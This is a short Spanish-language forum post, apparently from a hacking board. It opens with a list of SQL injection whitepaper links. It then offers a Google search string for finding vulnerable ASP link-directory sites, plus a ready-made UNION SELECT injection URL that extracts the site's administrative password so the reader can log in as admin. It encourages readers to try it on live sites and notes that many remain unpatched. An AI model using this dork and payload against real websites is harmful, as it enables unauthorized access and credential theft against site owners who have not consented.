Bueno, Pueden obtener Suficiente informacion sobre SQL injection en:
http://www.sqlsecurity.com/

SQL Injection [URLS]:

http://www.spidynamics.com/support/whitepapers/WhitepaperSQLInjection.pdf
http://www.spidynamics.com/support/whitepapers/Blind_SQLInjection.pdf
Muy Bueno:http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
http://www.nextgenss.com/papers/advanced_sql_injection.pdf
http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
http://www.net-security.org/dl/articles/IntegrigyIntrotoSQLInjectionAttacks.pdf
Basico, Espectacular(Recomentado)http://www.securitydocs.com/library/3587



bueno aka una injeccion muy buena en asp.. aun hay muchas webs vulnerables ya ke este bug aun no se ha resuelto y si algunos lo resuelven lo unico ke hacen es cambiar el numero de columnas donde dejan los pass xDD..

aka esta:
En google escribir
allinurl:links.asp?action=whatsnew

Injeccion asp....

links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config

Bueno con esto lograran entrar en las webs como admin mode xDDDDD..... haber prueben aunke no es muy bueno defacear webs lo bueno es encontrar el bug para tener mas conosimientos por eso es bueno aprender a hacerlo para luego si te vuelves web master ya sabras como te pueden afectar...

DOM